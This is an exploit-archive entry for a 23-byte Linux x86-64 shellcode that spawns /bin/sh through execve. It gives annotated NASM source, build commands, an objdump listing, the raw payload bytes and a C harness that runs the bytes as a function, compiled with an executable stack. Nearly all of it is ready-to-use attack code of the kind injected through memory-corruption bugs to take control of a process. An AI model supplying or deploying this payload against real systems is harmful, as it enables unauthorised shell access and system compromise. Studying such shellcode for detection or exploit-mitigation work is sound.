Linux/x64 execve(/bin/sh) shellcode (23 bytes) Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2019-05-23 | Type : shellcode | Platform : linux_x86-64



/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: rajvardhan
;Date: 23/05/2019
;Architecture: Linux x86_64
;Possibly The Smallest And Fully Reliable Shellcode

===========
Asm Source
===========

; Intel syntax, NASM. Linux x86-64 syscall ABI: rax = syscall number,
; rdi / rsi / rdx = first three arguments.
; Effect: execve("/bin//sh", NULL, NULL).
; Nothing follows the syscall, so if execve fails and returns, execution
; runs on into whatever bytes happen to come next in memory.
global _start
section .text
_start:
xor rsi,rsi                 ; rsi = 0 -> second argument (argv) is NULL
push rsi                    ; 8 zero bytes on the stack: NUL terminator for the path
mov rdi,0x68732f2f6e69622f  ; little-endian bytes 2f 62 69 6e 2f 2f 73 68 = "/bin//sh"; the doubled slash pads the path to exactly 8 bytes, so the immediate holds no zero byte
push rdi                    ; path now sits at [rsp], directly followed by the zero qword
push rsp
pop rdi                     ; rdi = address of the path (first argument); push/pop pair is 2 bytes
push 59
pop rax                     ; rax = 59, the execve syscall number on x86-64 Linux
cdq                         ; sign-extends eax into edx; eax is 59 (positive), so edx = 0 and the 32-bit write clears the upper half of rdx -> third argument (envp) is NULL
syscall
================================
Instructions for nasm compilation
================================

nasm -f elf64 shellcode.asm -o shellcode.o
ld shellcode.o -o shellcode

===================
objdump disassembly
===================

Disassembly of section .text:

0000000000401000 <_start>:
401000: 48 31 f6 xor %rsi,%rsi
401003: 56 push %rsi
401004: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
40100b: 2f 73 68
40100e: 57 push %rdi
40100f: 54 push %rsp
401010: 5f pop %rdi
401011: 6a 3b pushq $0x3b
401013: 58 pop %rax
401014: 99 cltd
401015: 0f 05 syscall

==================
23 Bytes Shellcode
==================

\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

======================
C Compilation And Test
======================

gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

*/

#include <stdio.h>

/*
 * The 23 payload bytes, split per instruction so each group can be matched
 * against the objdump listing in the header comment. Adjacent string
 * literals are concatenated by the compiler, so the array contents (23 bytes
 * plus the implicit terminating NUL) are unchanged.
 *
 * For static detection, the 10-byte group starting 48 bf is the most
 * distinctive part: it is a movabs whose immediate spells "/bin//sh".
 */
unsigned char shellcode[] =
    "\x48\x31\xf6"                              /* xor    rsi, rsi          */
    "\x56"                                      /* push   rsi               */
    "\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68"  /* movabs rdi, "/bin//sh"   */
    "\x57"                                      /* push   rdi               */
    "\x54"                                      /* push   rsp               */
    "\x5f"                                      /* pop    rdi               */
    "\x6a\x3b"                                  /* push   59                */
    "\x58"                                      /* pop    rax               */
    "\x99"                                      /* cdq                      */
    "\x0f\x05";                                 /* syscall                  */
/*
 * Test driver: reinterprets the address of the `shellcode` array as a
 * function pointer and calls through it.
 *
 * Converting an object pointer to a function pointer is not defined by
 * ISO C; it works here only as a compiler/platform extension.
 *
 * NOTE(review): `shellcode` is an initialized global, so it is placed in a
 * data section rather than on the stack. The build line in the header
 * comment relies on `-z execstack` to make that memory executable. On
 * recent x86-64 Linux kernels that flag reportedly affects the stack
 * mapping only, in which case this call faults with SIGSEGV instead of
 * running the payload -- confirm on the system under test.
 */
int main()
{
    typedef int (*entry_fn)();
    entry_fn entry = (entry_fn)shellcode;

    entry();
}